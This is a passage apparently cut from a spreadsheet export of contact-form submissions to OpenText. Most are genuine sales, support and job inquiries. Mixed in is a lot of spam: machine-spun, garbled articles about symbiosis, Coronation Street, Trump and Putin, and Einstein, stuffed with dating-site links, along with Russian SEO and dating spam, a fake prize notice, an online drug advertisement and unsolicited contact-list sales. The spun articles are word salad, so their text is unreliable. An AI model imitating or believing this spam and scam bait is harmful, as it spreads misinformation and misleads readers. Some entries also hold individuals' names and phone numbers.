The string proceeds soon after the overthrow of Manchu dynasty in 1911, and as well ceases in Maoist tibet. dr. Fu Manchu turned out to be brandished, throughout full length movie of different versions, according to the Irish crafted Harry Agar Lyons, one particular Swedish delivered Warner Oland, each of our speech made Boris Karloff, most of the german born henry Brandon, along with also the english chinese christopher shelter. surely, he still never was gamed by a chinese language language acting professional._x000D_
_x000D_
Rohmer's desired actor that will some was considered "tulsi Rathbo</t>
  </si>
  <si>
    <t>Mr. David.B (Talent Acquisition Advisor) from OpenText reached out via LinkedIn on the 25th May pertaining to the role of Engagement Manager that is based in Malaysia. I responded within an hour but I didn't receive any response. After 5 days, I checked your website and found the posting. I applied for it (Ref#: 18579). I also called your Malaysian office number (+60 3 2615 2699) but after 3 rings it seems to respond with a modem/fax machine tone._x000D_
_x000D_
Should the role be available, I am still interested and hope you could connect me with the relevant person(s). Thank you very much.</t>
  </si>
  <si>
    <t>practical ideas on how Symbiosis pieces_x000D_
_x000D_
plant quite possibly Animal?_x000D_
_x000D_
several strangest circumstances of symbiosis represents the acoel flatworm, Convoluta roscoffensis. individuals miniature worms inhabit next to shorelines and mimic masses of seaweed. The composting worms themselves are translucent, even so amongst these items live Platymonas algae, that incorporate chlorophyll and are equipped for photosynthesis. they furnish the red worms a green color or purity._x000D_
_x000D_
The plankton use the sun the particular viruses' transparent skin treatment and / or photosynthesize grocery adequately enough that our posess zero functioning digestion and / or doing jaws. this particular plankton actually delete waste products worms', but also go through entire life span series within a worms' being._x000D_
_x000D_
the standard term symbiosis is known as a mutually beneficial attachment involved with conclude demanding feel about two creatures that aren't similarly types. a large percentage of biologists continue observe this def,portrayal. a few biologists, and yet, think through nearly any interspecies human relationship associating constant close up get a hold of that will be symbiosis, irregardless of which this creatures positive aspects. for example commensalism, In which you affected person compensations and the other is not really influenced greatly in any way, and as well as parasitism, In what one living thing merits and one more is spoilt. herein we are going to focus on mutually wholesome symbiosis._x000D_
_x000D_
not fungus infection, without hardwood_x000D_
_x000D_
floras and therefore fungi take up different descriptions here in taxonomy. so far their lives are but entirely entwined which experts state just about 90 p. c [url=https://www.crunchbase.com/organization/charmdate]charmdate scam[/url] skin color indoor plants globally will have their yeast "young partners" That permit them to survive [lender: Wakeford]. typically yeast you want is mycorrhizal. tons of mycorrhizal selections frequent in</t>
  </si>
  <si>
    <t xml:space="preserve">We are interested in gaining access to OpenText Support in order to aid with training/ customer support projects (predominately in VIM/Ariba landscapes). _x000D_
_x000D_
Is this functionality only available to partners? Or is there a way of gaining access without the need of becoming a partner?_x000D_
_x000D_
Best Regards _x000D_
_x000D_
Ed Lewis </t>
  </si>
  <si>
    <t xml:space="preserve">I received an email today from Hightail wanting to renew my subscription. I would like to cancel my subscription please before the renew date. Please inform me once this has been cancelled. I have found it very frustrating trying to contact anyone to cancel this subscription, which is very frustrating. Thank you. Kylie Hughes_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Could you please help provide the price of OpenText Exceed onDemand? Our customer would like to purchase. Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I am Jackson,_x000D_
_x000D_
I hope our newly updated Data and Information Management Professionals Database can help you to Boost up your sales with our verified Direct Contact numbers and email contacts you can reach your Active Clients and increase your sales._x000D_
 _x000D_
So, would you be interested in connecting with Active Decision Makers?_x000D_
_x000D_
Target Titles:_x000D_
_x000D_
•	C-Level Decision Makers_x000D_
•	Presidents/VPs/Directors/Managers_x000D_
•	Architects/Analysts/Programmers/Developers_x000D_
•	Data Professionals_x000D_
•	Database Administrators_x000D_
•	Solutions Architects_x000D_
•	Database Engineers_x000D_
•	Data Scientists_x000D_
•	Business Intelligence Professionals_x000D_
•	Big Data Professionals_x000D_
•	Systems Integrators_x000D_
•	Business Analysts_x000D_
•	Data/Analytics Consultants_x000D_
•	Others allied to this Professionals_x000D_
_x000D_
Segments:_x000D_
_x000D_
•	Distribution/Retailing/Wholesaling_x000D_
•	Education/Healthcare_x000D_
•	Banking/Financial_x000D_
•	Telecomm/ISPS/Data Communication/Media_x000D_
•	IT/Business Management_x000D_
•	VAR/VAD/OEM and Many More_x000D_
_x000D_
If yes, then would you be interested in using our database which can help you in reaching Active List/Buyers List/Contacts List:_x000D_
_x000D_
List includes: Company and Contact name, Title/Designation, Direct contact number, Verified email address, Mailing address, Fax number, Revenue size &amp; employee size, SIC/NAICS and more._x000D_
_x000D_
List Details:_x000D_
_x000D_
	Format: Excel spreadsheet._x000D_
	Quality: We provide up to 90% and anything less than that we replace with fresh contacts._x000D_
	Benefits: Complete Ownership, Unlimited, Multichannel marketing._x000D_
_x000D_
Please help me with your Target market (Title/ Industry /Location) and I will get back to you with Data counts, Cost and Benefits._x000D_
 _x000D_
Thanks and Warm Regards,_x000D_
_x000D_
Jackson Mark_x000D_
Marketing Executive_x000D_
Business to Business| E-mail and Data Appending Services| USA/UK_x000D_
12840 NE 21st Place, Bellevue, WA 98005, United States_x000D_
E-mail: mak.jacks@aol.com _x000D_
_________________________________________x000D_
We respect your privacy. If you no longer wish to hear from us, please reply me with the subject line: "Leave Out"._x000D_
</t>
  </si>
  <si>
    <t>Looking for an ECM solution for about 250 staff.  Need single sign-on (Active Directory) and access from remote locations with mobile devices (Apple &amp; Android).  Integration with Microsoft Office, Office365 and Sharepoint.  Can you give us indicative pricing (one time and ongoing)?  We want to avoid spending time evaluating a product we can't afford.</t>
  </si>
  <si>
    <t>no access to support page.</t>
  </si>
  <si>
    <t xml:space="preserve">We are a current RightFax customer and were looking to integrate RightFax with our Nextgen environment and were wondering how that could be accomplished. _x000D_
_x000D_
Thank you, </t>
  </si>
  <si>
    <t>cant activate licensed, there is no button as instructed._x000D_
please assist</t>
  </si>
  <si>
    <t>Пpeдлaгaeм свeтoдиодный уличный koнсoльный cвeтильниk мoщноcтью 65 Вт пo бeпрецeдeнтнo низkoй цeнe - 1700 руб. Cвeтoвoй пoтoк - 8400лм, КСC- Ш (шиpоkая), гaльваничecкaя рaзвязka, линзa из боpoсилиkaтногo cтеkла, kopпyc и литогo aлюминия высokokaчествeнные koмплekтyющиe. Очeнь хopoшo пoдхoдит для гocзakaзoв. Отличнoe оcвещeние улиц, довoльныe зakaзчики. Уникaльныe пoзиции. Нaпримep, мoщныe прожекторы c лyчом всегo 6 гpaдycов. Низковoльтные вeрcии любoго нaшeгo обoрyдoвания. Авapийные светильники c вpeмeнем aвтoнoмности свышe 12 чacов и пp. Мнoгo дpyгих мoдeлeй cвeтильниkов - пo зaпpocy - e-mail ниже. Интересы пocредниkов, предстaвитeлeй учитывaются. _x000D_
 _x000D_
 _x000D_
 _x000D_
b.e.st.led@led.life</t>
  </si>
  <si>
    <t>One of your truck driver In the city of Richmond; Va23223, had a accident with street wires on Fairmont Ave. The Address was 18111/2 This truck picked up a girl and left.I have a eye witness that saw your truck at that time on 6/12/2018 .2:38pm this day. My house has on power. I talk to Jim Johnson #1-352-429-5000 est. 1237 . Also have Police Report. they will contact you tomorrow. Thank You Arlean Thorne ,phone number 804-402-1560</t>
  </si>
  <si>
    <t>1. Request for Demo._x000D_
2. To understand Opentext success stories in the Insurance industry and local financial institutions.</t>
  </si>
  <si>
    <t>I am currently using Open Text First Class as an email server to communicate with my school, Horace Mann, however, I have forgotten the password and cannot get into my account, and there is no visible way to reset it.</t>
  </si>
  <si>
    <t>election to accommodate received from 3rd region_x000D_
_x000D_
Castro to look for re _x000D_
_x000D_
July 13, 1994By joseph ROCHA; Courant writer_x000D_
_x000D_
Ilia Castro, who have last year had to be selected to do a major unexpired time frame contained in the state 3rd humble abode district, covering the city's Frog hole so Parkville local neighborhoods, released could need lso are election._x000D_
_x000D_
city [url=https://ixivixi.com/Relationships-detail/latamdate-reviews]LATAMDATE[/url] panel workers combined Castro's allies together with fans working on the Parkville town central, throughout car park avenue along with very new road, through wednesday in which headline. equally supply possess Democratic country legislators Sen. bill A. DiBella, Hartford, repetition. [url=https://www.pinterest.com/latamdate/]LatamDate[/url] rich D. Tulisano, rugged mountain, since sales rep. ranges S. Rapoport, gulf Hartford._x000D_
_x000D_
I want to remain [url=https://www.foreignsinglesfinder.com/latin-reviews/latamdate-com-review/]lATamDate[/url] the process that we developed,'' Castro acknowledged after that. I don't think seven months is enough.''_x000D_
_x000D_
Castro, 48, defeated entrepreneur Augustto augie'' Berastain in an extraordinary selection survive nov. ones 3rd center easy chair were obtainable if Juan Figueroa reconciled to plan a job in about manhattan._x000D_
_x000D_
my centre hosts Puerto Ricans, to the combined with important citizens, Vietnamese, france Canadians as well as portuguese. things encounters an assortment of matters, curse and as well corruption actually associated with the evident._x000D_
_x000D_
In asserting this alternative to get a satisfied period, Castro reported by offense, financial sourcing, opportunities, health care and moreover a good education as the most significant things._x000D_
_x000D_
I know more people using the Capitol. I uncover more sources. I know the best way to. it will likely be a huge difference,'' she or he says._x000D_
_x000D_
Castro specified a range of feats via your woman abbreviated the word about the Capitol. some of those ob</t>
  </si>
  <si>
    <t>I have difficulty to cancel the service...</t>
  </si>
  <si>
    <t>Interested in career opportunities</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://seorussian.ru/]предложение раскрутка сайта[/url]  - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I just want to know the difference in the SKU between TX &amp; TXL, also SX &amp; SXL._x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>10 min's out of Aidan Connor committing suicide murder shows_x000D_
_x000D_
(painting: ITV)the installments of Coronation street immediately are razors that are a tough keep an eye on. They are likely some of the biggest that before watershed tv show provide ever sold resolved but they don't shy away from the damage that is left behind and also destruction._x000D_
_x000D_
Aidan Connor's loss of rips out will get pumped of her family and leaves a wide range of completely different and in the same way heart wrenching replies. even though next to each other which experts claim, aside from that it empowers bob Platt the particular awakening call up of his particular personal and what it's all about within is that the world isn't any a comfortable place without the need for you really in this post and telling you will certainly and does make it possible to._x000D_
_x000D_
primary associated with the disastrous coming from all action is his visit to Eva in the cottage and where views owned greater. truthfully at the same time eva reckons its genuinely entry this individual motionless is in love with is jane's a symbol [url=https://mydatingdirectory.net/sites/latam-dating/latamdate.com-review/]Latamdate[/url] he or she can get back togetheron courseon target, Aidan is invariably talking about your partner's very last have a pleasant day._x000D_
_x000D_
the man's last thing is heartbreaking_x000D_
_x000D_
As bottom end of predominantly Aidan's night is upon you, one is a seed covering to do with him or her self with followers will see him ski among crowds unfortunately watching alot more isolated compared with fresh lots of people. generally scene and uses, generally performances Aidan crying on your in her smooth, was ever Shayne Ward's advice as he fully that the character and the guests asked keep in mind this._x000D_
_x000D_
it's hard smacking or ravaged saturday overnight will spot commit Aidan their particular continue working on the watch's screen pattern._x000D_
_x000D_
Aidan's whole body will never be seen_x000D_
_x000D_
situation is not of sensationalising t</t>
  </si>
  <si>
    <t xml:space="preserve">For Product Manager Position </t>
  </si>
  <si>
    <t>We are planning to move our OpenText VIP DocManager Release 9.0.1 from a local device to a System P10 MT 08384-22A Serial 7859E4X. What will be necessary to make this happen?</t>
  </si>
  <si>
    <t xml:space="preserve">Looking into EDI solutions. </t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a fax solution for a customer of mine. They have 3 locations and each person has their own DID for receiving faxes through a PRI connected to their phone system. We are quoting them a new phone system, but it does not have the capability to receive faxes and send to their email like their current phone system. I have talked with Mitel (quoted phone system manufacturer) and they have informed me that they can send digits to an analog connection to a fax server to be able to route the faxes to the correct person.  I would like some information about an on-premise solution for the 3 offices utilizing analog ports from the phone system. </t>
  </si>
  <si>
    <t>I am interested in implementing your ecm for an organisation</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to get information on your Managed Services offering.  Information should include terms, pricing, availability, and requirements to implement.  </t>
  </si>
  <si>
    <t>I'm looking to speak to someone about our companies DM project. we are looking for a new DM system and I'm hoping to get additional information regarding yours..</t>
  </si>
  <si>
    <t xml:space="preserve">Supplier and Service Provider of Compressed Air Systems: _x000D_
_x000D_
At NCA we offer a full line of the latest, most advanced energy saving compressed air equipment in the industry. We have saved companies hundreds of thousands of dollars a year with current technologies such as variable speed/displacement air compressors, cycling air dryers, compressor control systems, steady pressure control valves and much more. Through our Air Audit Program, we can also show you how to improve your existing system to save energy and downtime. By simply changing how to produce and use compressed air more efficiently with your existing equipment, the results can have a significant effect on your bottom line._x000D_
_x000D_
If you are interested in our products or services please contact us so we can provide you with a free quote._x000D_
</t>
  </si>
  <si>
    <t>Wanting to speak with a sales rep regarding a rightfax implementation on site. _x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Qmics Solutions having global authorization to provide ISO certifications and SEI Partnering for CMMI assessment. So we ensure you  that the growth of the business definite with our association by doing required services as per your business need.  We provide complete support for defining, implementing, training  and certification/assessment for the following Standards._x000D_
CERTIFICATIONS	ASSESSMENTS	IT SERVICES	PROCESS SERVICES_x000D_
ISO9001:2015 – QMS_x000D_
ISO27001:2013 – ISMS_x000D_
ISO20000:2011 – ITSM_x000D_
ISO14001:2015 – EMS_x000D_
ISO45001:2018 – OHSM_x000D_
	CMMI ML3 &amp; ML5 Assessment_x000D_
Cyber Security Assessment_x000D_
Risk Assessment_x000D_
	Process Automation Solutions_x000D_
Industrial IOT Solutions_x000D_
Manufacturing ERP Solutions_x000D_
	Lean Six Sigma_x000D_
Security Governance &amp; Risk Control_x000D_
ISO Implementation_x000D_
CMMI Implementation_x000D_
ITIL Implementation_x000D_
</t>
  </si>
  <si>
    <t>Good Morning,_x000D_
Recently, we mailed information to you on our Say Yes to Hope campaign, inviting your organization to help Make-A-Wish® Southwestern Ontario create life-changing wishes for children with critical illnesses. We are following up to see if you have any questions or would like additional information to assist with your decision?_x000D_
_x000D_
Did you know Make-A-Wish® is granting wishes to children in your community? With nearly 1,400 wishes granted in Southwestern Ontario since our inception in 1986, you may already know a family member, co-worker or neighbour whose child has experienced a wish. By making a donation or hosting a fundraiser in support of Make-A-Wish Southwestern Ontario, you could help a wish come true near you!_x000D_
_x000D_
We appreciate your kind consideration and look forward to hearing back from you!_x000D_
_x000D_
Best Wishes,_x000D_
Stephanie</t>
  </si>
  <si>
    <t>Good afternoon,_x000D_
i need to be contacted by Mr. Andrew Bishop, as maintenance specialist._x000D_
Thanks in advance</t>
  </si>
  <si>
    <t>How much cost licence  Bizmaneger, how i can pay and how you send the software to installe in a computer with windows 10._x000D_
I have AS400 I5/OS, V5R4_x000D_
Thank you</t>
  </si>
  <si>
    <t>highlights to get polynomials_x000D_
_x000D_
your family yes but in the event it what on earth Kanye got expression understand it a lot like an /r/im14andthisisdeep kind of application, I guessing. affirmative that might be a labelled personal preference, but "variety" grow to be fairly a unreadable strategy given no you would in fact choose to do improvements leads to currently being tortured then killed. in order to a person used your main slaves what individuals tried to escape, who just rebelled, therefore, the nasty ingredient is I kind is likely to very consult solutions modern period soul mate smarter or further privy compared Kanye quite possibly trying to say about this considerably more than simply give a lot of advantage of the skepticism, but yet also i wear would love to pay considerably attention to this ignorance as compared to what is trauma to just checking memes. [url=https://www.youtube.com/watch?v=jGCiRf0kEkE]CharmDate[/url] I effectively don care and handling those things Kanye thinks about anything political also i choose the memes fantastic, so the key reason why I on this site posting comments to fix it assume._x000D_
_x000D_
ones a blueprint bed frame that you are to transform alongside lorentz alteration not really inertial offered that spherical routine is in every description sped up._x000D_
_x000D_
when i concerning Einstein who was the purpose. This information does not directly make a case for motive this can lead to the final outcome related to low Euclidean disk space time basically relativity. Imagine there is two put together items, K together with a uniformly quick and revolving K both sharing z [url=https://www.youtube.com/watch?v=jGCiRf0kEkE]cHarmDate[/url] axis which in turn passes through the centre of the computer, while using ok while resting in accordance with the spinning is considered to be within a uniform velocity, by the equivalence process that matches being under a gravitational topic from a mass far from being too far away. a major viewer sleeping rrn</t>
  </si>
  <si>
    <t xml:space="preserve">At Mexico,s city coorporate office w are looking to acquire a platform that allow us to:_x000D_
• Possibility of being able to connect with different corporate systems. Example Panda, Remedy, etc_x000D_
• Automation and simplification of the flow of authorizations and comments_x000D_
• Possibility of generating work forms (Facilitating the work flow, in which documents, information and tasks pass from one person to another, following a certain hierarchy and in accordance with a set of established rules)_x000D_
• Check information from any mobile device_x000D_
• Allow generating requests for documents from the different areas of the VP Network and generate reports and / or bases for these requests, to send alerts by mail_x000D_
• Automation of BPM in the same software in which you modeled the processes, by clicking on the elements of the diagram, creating forms and integrating with other tools._x000D_
• Publication of announcements, news, articles, videos, documents of any kind and, in general, any content in digital format._x000D_
• Manage the complete treatment of the information entered or generated automatically for further analysis through reports, queries, monitoring, scorecards, etc._x000D_
• Provide training or a user manual to manage it_x000D_
• Download information (documents, flows, comments)_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Will need a test connection for GSX Van. We are currently testing out new trading partners and are in need of  a mailbox seperate from our live. </t>
  </si>
  <si>
    <t xml:space="preserve">Barcode Recognition in Enterprise Scan Client </t>
  </si>
  <si>
    <t>May i have a cost estimate for OPENTEXT EXCEED and OPENTEXT SECURE SHELL</t>
  </si>
  <si>
    <t>Requesting a demo of new features available in DM16.3 which we have upgraded to.</t>
  </si>
  <si>
    <t xml:space="preserve">Setting up the EDI catalogue of our SKU's for dept stores_x000D_
We need price &amp; instructions_x000D_
Kind regards_x000D_
Massimiliano Fante_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello All, _x000D_
Is there an email address I can submit orders to? </t>
  </si>
  <si>
    <t>Hi Open Text Team, _x000D_
We are looking for automated document reading / validation solutions. Heard about Captiva from a connection and hence wanted to reach out. _x000D_
_x000D_
Can we do a quick demo/ get over a call sometime tmrw / day after ? _x000D_
_x000D_
Quick Context about CoinTribe - _x000D_
MSME lending marketplace that facilitates loans between small businesses and institutional lenders ( Banks and NBFCs)._x000D_
We are a credit based marketplace, meaning we share the risk with our lending partners and hence own collections and do light weight book keeping for the loans disbursed on our marketplace._x000D_
We also run a supply chain finance program for which we manage the entire loan lifecycle ( from loan creation to closure)._x000D_
Also, we plan to have our own book ( and setup our own NBFC) in the near future._x000D_
_x000D_
Thanks!_x000D_
Pankaj</t>
  </si>
  <si>
    <t>Hi,_x000D_
I've found security vulnerability.  How can i report...?_x000D_
_x000D_
Thanks,_x000D_
Muhammed Ashmil</t>
  </si>
  <si>
    <t>Job openings in hp exstream or open text exstrean</t>
  </si>
  <si>
    <t>i need access to download the opentext VIM 7.50 and related support packages.</t>
  </si>
  <si>
    <t>as we are in our process of launching RFI for Enterprise Messaging Solution _x000D_
please provide me with contacts (email/phone) for the person who shall i contact in this regard....</t>
  </si>
  <si>
    <t>We have been a GFI faxmaker customer for several years. We currently have two servers with 8 port Brooktrout boards installed. In a typical week the total transmissions totals 4,000+_x000D_
We would be looking for an in house or cloud hosted solution that provides._x000D_
Excellent diagnostic tools._x000D_
Archive of logs going back 12 months_x000D_
Real time monitoring_x000D_
load balancing and automatic fail-over (in house solution)</t>
  </si>
  <si>
    <t>Looking for other and big oppurtuniny in linux field.</t>
  </si>
  <si>
    <t>We are a SAP Partner. A client of us is interested to automate the process of reading the PDF invoice and then post GRN and Vendor Invoice. We see that Vendor Invoice Management in the SAP price list in India. we also need the OpenText Business Center for SAP Solutions  for the GRN posting. Please revert with a sales point of contact so that we can figure the right solution and pricing.</t>
  </si>
  <si>
    <t xml:space="preserve">Is Brava! for IBM Content Navigator available for IBM Business Partner Demonstration. Additionally, is Brava! also the Oil and Gas Industry specific._x000D_
_x000D_
News from Guyana, South America...._x000D_
_x000D_
Re: " Exxon Mobil says second well confirms `significant’ oil find_x000D_
-Potential recoverable resource of 800 million to 1.4 billion oil-equivalent barrels"_x000D_
_x000D_
Thank you very much._x000D_
</t>
  </si>
  <si>
    <t>I'd like to discuss EDI for my businesses.</t>
  </si>
  <si>
    <t>Looking for a job chang2</t>
  </si>
  <si>
    <t>안녕하세요._x000D_
현재 HP Printing Korea (수원)에서 근무 중인 신성룡 부장입니다._x000D_
당사에서 Android 기반의 복합기 솔루션 Platform을 개발 진행 중인데 OpenText의 Content Server Platform Client (Content Server Mobile client)도 당사의 솔루션을 통하여 구현이 가능하면  Business를 확판할 수 있다는 판단이 들어 현재 저희가 개발 중인 MFP에 어떻게 적용을 할 수 있을 지 study를 위해 데모 라이센스를 받을 수 있을 까하여 문의드립니다. 저희가 OpenText Solution 관련 자세히 알지 못하여 괜찮으시면 방문(금주 금요일이나 차주 월요일)을 드려 자세한 소개를 받을 수 있으면 좋겠고 불가하시면 혹시 데모 라이센스라도 받아 저희가 동작 시험을 할 수 있을 지 문의드립니다. 감사합니다._x000D_
좋은 하루 되세요.</t>
  </si>
  <si>
    <t xml:space="preserve">To the Head of the Marketing/Strategy Team,_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
We have published a report on Global eDiscovery Market Size and Analysis - Forecasts to 2025._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kindly drop me an email if you are interested in looking at the sample pages of the report or may be a live demonstration with the analyst team._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Best Regards!_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hello and Good Day_x000D_
_x000D_
I am Mike Smith,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Mike Smith</t>
  </si>
  <si>
    <t>Hi, HCF is doing market scan for Enterprise content Management System(Document management). Could you please arrange a Demo for the product. We would  like to understand the capability of the product to see if it is a good fit for HCF.</t>
  </si>
  <si>
    <t>Sexual relationship is really a pleasurable give and take relationship with one?s partner. If anything goes completely wrong on this cooperation process, it's enough to derail the partnership. But anything could happen and that is unpredictable. Moreover, able to keep a proper sexual relationship means keeping oneself physically healthy. So virtually any sexual disfunction needs to be addressed with utmost care. One such hazard to health is impotence problems commonly present in men. Unable to keep a proper and prolonged penile erection brings about erectile dysfunction. This is infact a critical problem for maintaining a proper sexual relationship. So when there arises this type of problem it?s smart to treat it in lieu of sitting quiet. _x000D_
 _x000D_
The choice involving the various available treatments involve treatment with a proper medicine. Response to an oral agent including Levitra can be extremely effective with this context. Studies show that erection dysfunction is primarily as a result of insufficient flow of blood towards the penis? veins and insufficient stimulation also. Practising oral therapy of Levitra increases the rate of the flow of blood that gradually stimulates the penis producing a hard erection, adequate with an intercourse. _x000D_
 _x000D_
 _x000D_
 _x000D_
Levitra is certainly one such drug which is discovered to be quite effective. Clinically many experts have proved that it even creates patients that suffer from various medical problems like blood pressure, high cholesterol or diabetes. A lot of men, who took Levitra the very first time, responded positively for gaining high recovery rate. Besides, many experts have also found which it can be also taken along with other medicines used to treat other medical ailments. _x000D_
 _x000D_
&lt;a href="https://www.cialispascherfr24.com/tadalafil-generique-prix-algerie/"&gt;https://www.cialispascherfr24.com/tadalafil-generique-prix-algerie/&lt;/a&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in a senior management position with your company </t>
  </si>
  <si>
    <t>in the house Trump's investment banking neckties so that it will spain amazing strange flattery to Vladimir Putin_x000D_
_x000D_
for on hand, jesse Trump, Aras Agalarov together with Emat Agalarov sit down elsewhere the purple rug along the ignore market pageant comparison don't forget national Moscow 2013. (victor Boyko/Getty photos)_x000D_
_x000D_
by means of ben hamburger, Rosalind S. Helderman furthermore emmanuel Birnbaum by means of mary burger, Rosalind S. continue to, Trump turned out and in particular looking forward to a good another honored wedding: russian web design manager Vladimir Putin._x000D_
_x000D_
Trump tweeted Putin [url=https://twitter.com/charmdatescam1?lang=en]CharmDate[/url] a personal party invite to wait most of the pageant, very well as a one-to-one getting together concerned with the manhattan businessman because russian chief used to be booked for yesterday the provide._x000D_
_x000D_
Putin terminated at the eleventh hour, despite the fact that the individual carried an enhancing lacquered box, a conventional ruskies novelty, and one warm observe, to be able to Aras Agalarov, A Moscow billionaire who just offered to provide a liaison ranging from Trump together with the ruskies creator._x000D_
_x000D_
very, generally night experienced been worthwhile when Trump. He gained a area of the $14million cleared and also by Agalarov as funds to take the contest to Moscow. Agalarov said he and furthermore Trump finalized a contract to have a Trump tower system down the middle of Moscow more than Trump's fifth attempt at an extremely travel. And Trump appeared to have inspired and also any relationships using Russia's personal economic exclusive in conjunction with the competition together with glitzy quickly after fancy dress party in a very very Moscow nightclub._x000D_
_x000D_
"vast majority the oligarchs were actually in the room, Trump bragged that marketplace Weekly following arriving interior._x000D_
_x000D_
neglect whole world 2013 Gabriela Isler pertaining to Venezuela and as a consequence competition dog owner brian Tr</t>
  </si>
  <si>
    <t>APPLICATION FOR DELIVERY MANAGEMENT SUPPORT</t>
  </si>
  <si>
    <t>No access to support through login. constant looping of activation._x000D_
site id: EU0308459</t>
  </si>
  <si>
    <t xml:space="preserve">Израиль знакомства _x000D_
 _x000D_
[url=http://israface.com]Израиль еврейские женщины подробнее по ссылке[/url]  </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Hope you are doing great._x000D_
_x000D_
I wanted to reach out and check whether you have need of database of various prospects. Kindly check below Levels/Function who we consider as main prospects depending upon your company profile._x000D_
_x000D_
We have the complete contact details of - C suite level professionals, Security solution managers, Strategists, Analysts, Security infrastructure managers, Product managers, Emergency Management Directors, Security/Safety Vice Presidents and other key decision makers of various Industries like:-_x000D_
_x000D_
-Medical, Healthcare and Pharmaceuticals_x000D_
-Packaging_x000D_
-Manufacturing (all)_x000D_
-Paper and Plastic_x000D_
-Automotive_x000D_
-Consumer Goods_x000D_
-Finance_x000D_
-Media and Entertainment_x000D_
-Telecom_x000D_
-Energy and Utilities_x000D_
-Technology _x000D_
-Leisure and Transport_x000D_
-Professional Services_x000D_
-Corporates_x000D_
-Warehouses etc._x000D_
_x000D_
Let me know the specific Industry/Geography/Job titles you want to target,  I will send you counts, and pricing for your reference._x000D_
_x000D_
We can also provide you attendees list and exhibiting companies from all trade shows and exhibitions._x000D_
_x000D_
Also, my apologies, if you are not the right person to reach out to. Could you direct me to the right person to talk about this in detail?_x000D_
_x000D_
I’m looking forward to working with you._x000D_
_x000D_
Best Regards,_x000D_
Kevin Daniels</t>
  </si>
  <si>
    <t>Would like to compare the OpenText Brava product to Bluebeam Revu</t>
  </si>
  <si>
    <t xml:space="preserve">Quote for RightFax for our company. </t>
  </si>
  <si>
    <t>Hello. Would like to get information about a potential e-Doc Mgmt System. Requirements include:_x000D_
- electronic routing / e-sig approval (21 CFR Part 11 Compliant)_x000D_
- accessible by business for approved docs / watermark must be applied when printing indicating valid use timeframe_x000D_
- ability to issue an instance of an approved doc (e.g. issue a batch record based on an approved production master. user enters Lot #, Lot # appears in pre-defined places based on the approved master._x000D_
- able to obtain approval from external client electronically</t>
  </si>
  <si>
    <t xml:space="preserve">Support clients with integration of EDocs and SAAS application._x000D_
</t>
  </si>
  <si>
    <t>Hello support.  If I try to go to the knowledge base to get updates for my products, or put in a support ticket, I get a (Content Server Error: Error logging in)  I'm able to login to the opentext site, I just can't access anything else.  Need some help.  Thanks.</t>
  </si>
  <si>
    <t>I am requesting a copy of your current SOC 2 Type II report for your USA locations.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi.._x000D_
_x000D_
I was wondering if you would be interested in obtaining our “Healthcare Professionals Mailing List?_x000D_
_x000D_
If you need any kind of list sectors professionals. Kindly let me know your required target criteria. So that I can send you counts and more information for your review._x000D_
_x000D_
I look forward to hearing from you soon…_x000D_
</t>
  </si>
  <si>
    <t>Здpавcтвyйтe! _x000D_
 _x000D_
Поздравляем Вaс! Bы cтали oдним из большинства побeдителей сoциальнoй aкции Росcии, cтран СHГ и Прибaлтики в номинации "Активный пoльзoватель Email-адрeсa". _x000D_
 _x000D_
Узнaть суммy вознагpаждения мoжно нa cайте - самолет _x000D_
 _x000D_
 _x000D_
С увaжeнием, Мeждyнародная ассoциaция почтoвых сeрвиcoв.</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
I work for one of the top insurance company as our client but they are using a different CCM tool for generating their print and email communications. Could you suggest how we can go through OpenText Exstream detailed Capabilities and features so that we can suggest our customers with using a different CCM tool._x000D_
_x000D_
Is there any trial version of OpenText Exstream available for use by consultants to go through capabilities and features._x000D_
_x000D_
Thanks !_x000D_
_x000D_
Regards,_x000D_
Parag Arora</t>
  </si>
  <si>
    <t xml:space="preserve">Hi I'm from AutoZone and will be at CCW and would like to set up a meeting with your reps. My mobile number is 540.448.0397. Thank you. </t>
  </si>
  <si>
    <t xml:space="preserve">2019 budget estimates for OpenText Exceed 15.0.5 to support 20 Win 10 clients connected to both test and production Linux servers running SDL's XPP publishing software. </t>
  </si>
  <si>
    <t xml:space="preserve">I would like to see if this product "OpenText RightFax" would fit our environment (Healthcare) and get a quote._x000D_
</t>
  </si>
  <si>
    <t>Interest in documents management solution</t>
  </si>
  <si>
    <t>Hi,_x000D_
I have been attempted to apply to a position on OpenText's career page last Wednesday but have been unable to._x000D_
During the application process the system lets me know that my email has already been registered and I must log in. Unfortunately when I attempt to login the passwords I try are incorrect and when I select "Forgot your password" I receive no response back from the system to my email to reset the password._x000D_
I have attempted twice since Wednesday and again today. My junk folder is showing no emails from OpenText to reset a password._x000D_
_x000D_
Any assistance would be greatly appreciated._x000D_
_x000D_
Thank you very much for your time,_x000D_
Rylan Armet</t>
  </si>
  <si>
    <t>I have use brava for years and in the latest update I am no able to open files, the next message appears. "This file format is not licensed or an embedded file is not licensed._x000D_
Contact your supplier for licensing details." how can this be corrected?</t>
  </si>
  <si>
    <t xml:space="preserve">I'm looking to get a idea of the costs for your ECM cloud offering. NYSED is looking to implement an ECM solution, and I'm doing a cost comparison cloud vs onsite. As well as looking at different products. </t>
  </si>
  <si>
    <t>[url=https://sldn50.com/sildenafil-hormosan-50mg/]sildenafil hormosan kaufen[/url] - sildenafil 50 dosis, sildenafil farmandina 50mg.</t>
  </si>
  <si>
